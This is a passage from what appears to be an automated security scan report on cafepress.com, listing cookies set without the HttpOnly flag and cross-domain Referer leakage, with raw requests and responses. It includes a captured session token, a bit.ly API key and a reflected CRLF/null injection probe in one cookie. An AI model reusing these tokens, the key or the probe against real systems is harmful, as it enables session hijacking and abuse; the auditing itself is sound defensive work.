Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.72. http://www.cafepress.com/make/makeacard.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/makeacard.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

3.73. http://www.cafepress.com/make/personalized-gifts previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/personalized-gifts

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/personalized-gifts HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.74. http://www.cafepress.com/make/personalized-ornaments previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/make/personalized-ornaments

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /make/personalized-ornaments HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.75. http://www.cafepress.com/sk/TheGamingApe previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.cafepress.com
Path:	/sk/TheGamingApe

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sk/TheGamingApe HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

3.76. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:00 GMT; path=/
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:00 GMT; path=/
tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:00 GMT; path=/
cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:00 GMT; path=/
pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:00 GMT; path=/
cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:01 GMT; path=/
cp-v=D0026F27AADDAF9A26C54608326FC1BA; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:01 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

4. Cross-domain Referer leakage previous next
There are 7 instances of this issue:

/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/+Eat+Sleep+Game+Light+T-Shirt%2C299007536
/cp/info/help/index.aspx
/cp/info/sell/index.aspx
/cp/moredetails.aspx
/cp/viewcart.aspx

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

4.1. http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/+%27Campers+Suck%27+Video+Game+T-shirt+for+Men%2C273694144?cmp=pfc--ca--us--152--273694144&utm_term=273694144&utm_campaign=Dark+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601

The response contains the following links to other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content3.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://content9.cpcache.com/js/http_request.js
http://images4.cpcache.com/product/273694144v2_480x480_Back_Color-Black.jpg
http://images4.cpcache.com/product/273694144v2_480x480_Front_Color-Black.jpg
http://images4.cpcache.com/product/273694144v2_48x48_Front_Color-Black.jpg
http://images4.cpcache.com/product_zoom/273694144v2_400x400_Front_Color-Black.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
Cteonnt-Length: 118606
Vary: Accept-Encoding
Date: Sun, 26 Dec 2010 13:56:00 GMT
Connection: close
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:56:00 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c%7c2%2cchanneladvisor_us_become%2c20101226055600%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:56:00 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:56:00 GMT; path=/
Set-Cookie: cp_st=8a6d1%00%0d%0aaf2c26c8a28; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
Set-Cookie: cp_sc=100010; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:26:00 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 118606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<meta property="og:site_name" content="CafePress.com" />

   <link rel="stylesheet" href="http://content3.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all">

   <script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...

            <img border="0" class="imageborder" name="mainimg" src="http://images4.cpcache.com/product/273694144v2_480x480_Front_Color-Black.jpg" alt="'Campers Suck' Video Game T-shirt for Men" id="productImageLarge" />
<div class="clear">
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images4.cpcache.com/product/273694144v2_48x48_Front_Color-Black.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images4.cpcache.com/product_zoom/273694144v2_400x400_Front_Color-Black.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images4.cpcache.com/product/273694144v2_480x480_Back_Color-Black.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...

<script type="text/javascript" src="http://content9.cpcache.com/js/http_request.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script src="http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"></script>
...[SNIP]...

4.2. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601

The response contains the following links to other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content0.cpcache.com/js/http_request.js
http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg
http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
http://www.mycustomtomtom.com/

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 95184
Date: Sun, 26 Dec 2010 13:44:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ASP.NET_SessionId=hgypw52u3gij4ovwij2xb245; domain=cafepress.com; path=/; HttpOnly
Set-Cookie: cpvr=b7228e23-2409-4402-9cd7-ee1a3db28b4f; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/
Set-Cookie: cpv=8f33e318-123c-4498-9d41-8084438c139c; domain=cafepress.com; expires=Fri, 26-Dec-2110 13:44:48 GMT; path=/
Set-Cookie: tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Mon, 27-Dec-2010 13:44:48 GMT; path=/
Set-Cookie: tfx_touch=2%2cchanneladvisor_us_become%2c20101226054448%2c; domain=cafepress.com; expires=Sat, 21-Dec-2030 13:44:48 GMT; path=/
Set-Cookie: cppid=5185601; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: xid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: jid=0; domain=cafepress.com; expires=Sun, 02-Jan-2011 13:44:48 GMT; path=/
Set-Cookie: pid.guid=6e8d3e27-a6be-4a44-b5ef-2939ef9ee677; domain=cafepress.com; expires=Wed, 23-Dec-2020 13:44:48 GMT; path=/
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:14:48 GMT; path=/
Set-Cookie: cp-v=40EF613B13210CD6C2BDE6E814B3A8DC; domain=cafepress.com; expires=Sat, 26-Dec-2020 13:44:48 GMT; path=/
Set-Cookie: cppss=2x3; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 95184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/
...[SNIP]...
<meta property="og:site_name" content="CafePress.com" />

   <link rel="stylesheet" href="http://content0.cpcache.com/css/marketplace/pdpv4.css?10182010" type="text/css" media="all">

   <script type="text/javascript">
...[SNIP]...
</script>

<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
...[SNIP]...
<a href="http://www.cafepress.com" title="CafePress"><img src="http://content1.cpcache.com/global/img/cafepress-us.gif" width="112" height="67" alt="CafePress" title="CafePress" style="margin:2px 0 0 2px;" /></a>
...[SNIP]...
<li><a href="http://www.mycustomtomtom.com" target="_blank">custom gps</a>
...[SNIP]...
</ul>
<img src="http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010" width="960" height="37" style="margin-top:13px;" id="pledgeBanner"/>

<div class="clear">
...[SNIP]...

            <img border="0" class="imageborder" name="mainimg" src="http://images6.cpcache.com/product/299007536v4_480x480_Front_Color-AshGrey.jpg" alt="Eat Sleep Game T-Shirt" id="productImageLarge" />
<div class="clear">
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img1','48x48','480x480');setThumbnailPerspective('front');"><img name="img1" src="http://images6.cpcache.com/product/299007536v4_48x48_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img3','48x48','480x480');setThumbnailPerspective('front');"><img name="img3" src="http://images6.cpcache.com/product_zoom/299007536v4_400x400_Front_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...
<a href="javascript:swapimg('mainimg', 'img2','48x48','480x480');setThumbnailPerspective('back');"><img name="img2" src="http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg" border="0" alt="front image" width="48" height="48"></a>
...[SNIP]...

<script type="text/javascript" src="http://content0.cpcache.com/js/http_request.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"></script>
...[SNIP]...

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script src="http://content0.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"></script>
...[SNIP]...


<script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"></script>
...[SNIP]...

4.3. http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+Eat+Sleep+Game+Light+T-Shirt%2C299007536

Issue detail

The page was loaded from a URL containing a query string:

http://www.cafepress.com/+Eat+Sleep+Game+Light+T-Shirt%2C299007536?cmp=pfc--ca--us--007--299007536&utm_term=299007536&utm_campaign=Light+T-Shirt&sourcecode=affiliate&utm_source=ChannelAdvisor_US_become&utm_medium=productfeed&pid=5185601

The response contains the following links to other domains:

http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content1.cpcache.com/global/img/cafepress-us.gif
http://content1.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content2.cpcache.com/css/marketplace/pdpv4.css?10182010
http://content5.cpcache.com/js/http_request.js
http://content9.cpcache.com/global/img/hpbanners/ourpledge-us.gif?12022010
http://images6.cpcache.com/product/299007536v4_480x480_Back_Color-AshGrey.jpg
